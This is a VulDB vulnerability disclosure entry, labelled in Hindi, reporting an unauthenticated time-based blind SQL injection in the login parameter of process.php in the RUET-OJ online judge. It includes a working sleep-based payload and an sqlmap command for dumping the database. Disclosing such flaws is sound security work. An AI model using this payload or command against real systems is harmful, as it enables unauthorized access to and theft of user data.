| शीर्षक | shawon100 RUET-OJ BETA 2016 Unauthenticated Time Based Blind SQL Injection |
|---|
| विवरण | There is a time-based blind SQL injection vulnerability in the "un" parameter of the process.php file, allowing an attacker to dump the entire database without needing to be logged in.
An unauthenticated attacker could insert SQL injection payloads into the "un" parameter of the POST request to log in to the application. This would allow them to dump the application's database without needing to be logged in. Affected file: process.php
[POC]
Check for a Time-based SQL injection vulnerability:
Send a POST to /process.php with the following payload: un=TESTE'+and+sleep(5)%23&ps=PASSWORD&uri=home.php
Check the return time using Burp or curl.
Automate with sqlmap to perform the database dump.
sqlmap -u http://<ip>/process.php --data "un=USERNAME&ps=PASSWORD&uri=home.php" -D reg --tables
The person responsible for the application was informed via email on July 25, 2025. But I did not receive a response.
Link application: https://github.com/shawon100/RUET-OJ |
|---|
| उपयोगकर्ता | ManinhuGuitar (UID 84672) |
|---|
| सबमिशन | 13/10/2025 11:12 PM (6 महीनों पहले) |
|---|
| संयम | 27/10/2025 11:22 AM (14 days later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 330103 [shawon100 RUET OJ तक 18fa45b0a669fa1098a0b8fc629cf6856369d9a5 POST Request /process.php un SQL इंजेक्शन] |
|---|
| अंक | 17 |
|---|